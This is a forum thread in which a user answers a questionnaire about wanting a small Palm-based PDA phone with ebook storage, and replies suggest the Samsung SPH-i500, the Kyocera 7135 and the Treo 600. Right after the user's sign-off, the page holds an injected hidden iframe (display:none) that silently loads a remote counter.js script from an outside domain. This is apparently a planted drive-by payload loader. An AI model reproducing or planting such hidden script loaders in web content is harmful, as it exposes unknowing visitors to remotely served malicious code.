Hi, all - looking for a PDA phone. Thanks in advance for any help.
1. What PDA and/or mobile phone do I use today?
Nokia 8265
2. Are locked into a mobile carrier (i.e. Verizon Wireless, Sprint PCS, etc.), or do you prefer a particular carrier? Do you know if one carrier has better coverage in places that you need to be?
Cingular currently, but open to change. Cingular has poor coverage at my home - have to go outside to use the cell phone!
3. Where are you based? Do you stay in one place or travel a lot? Do you travel internationally... how much and where? Do you intend to use your pdaPhone there?
Dallas/Ft. Worth area - don't travel a lot, rarely leave USA
4. Do have a preference of Palm, Pocket PC, Symbian, etc.?
Preferably Palm, would consider Pocket PC
5. Are you likely to run it the way it came out of the box, or do you intend to load a whole lot of extra applications and stuff on it? Do you know of anything now that you will need to run?
I'd like to have PalmReader and an expansion card to put books on... and Avantgo.
6. How important is data, and what would you use data for (i.e. web, email, remote terminal, etc.)?
Not very.
7. Do you do SMS messaging a lot?
Nope.
8. Do you need a GPS for mapping and navigation?
No - but sounds like the cool factor would be very high!
9. What is your size preference.. very close to the smallest cellphone, or you don’t care.. function over size?
Smaller the better
10. How will you carry it... pocket, belt, purse, etc.?
Probably pocket, belt if I can.
11. Do you prefer a particular form factor… flip-phone, candy bar, etc?
No preference
12. Do you prefer a QWERTY keyboard, or are you cool with a stylus?
Stylus is cool
13. Do you want to play a lot of games? What kinds?
Not really.
14. Do you want to listen to music? What kind... mp3, streamed, etc.?
Not at the expense of battery life. Would be a nice option, but not absolutely necessary.
Thanks to all for any info!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
For the smallest size, the Samsung SPH-i500 Palm flip phone is a good option, but no expansion card available... so you'd be limited on how many ebooks... still think its very doable for what you've described. It is a very cool phone, and available from Sprint.
For something a little larger, but with an expansion slot... still a Palm flip phone, the Kyocera 7135 from Verizon. This product has been out a lot longer. There may be a new version of this coming out early next year, but there have been zero rumors about it... nothing.
Those are the two primary stylus based Palm pdaPhones.
The Treo 600 is another choice, but it has a keyboard and is bigger than the SPH-i500.
If at all possible, try to get you hands on these so you can understand the form factor and how it feels in your hands. This is easy for the 7135, but the other two are going to be hard to find in a store.
another question, if you don't mind... I asked for Palm 'cause that's what I'm most familiar with. What do the Pocket PC models or the Motorola MPx200 do that the Samsung Palm based models won't? Any threads on this board that discuss this? (I looked around some and didn't find that directly addressed - maybe I didn't look in the right place!)
The one thing I'd like to have that the SPH-i500 doesn't seem to have is some kind expansion card to hold ebooks. I do like the small flip style of the Samsung, though - the smaller the better for me.
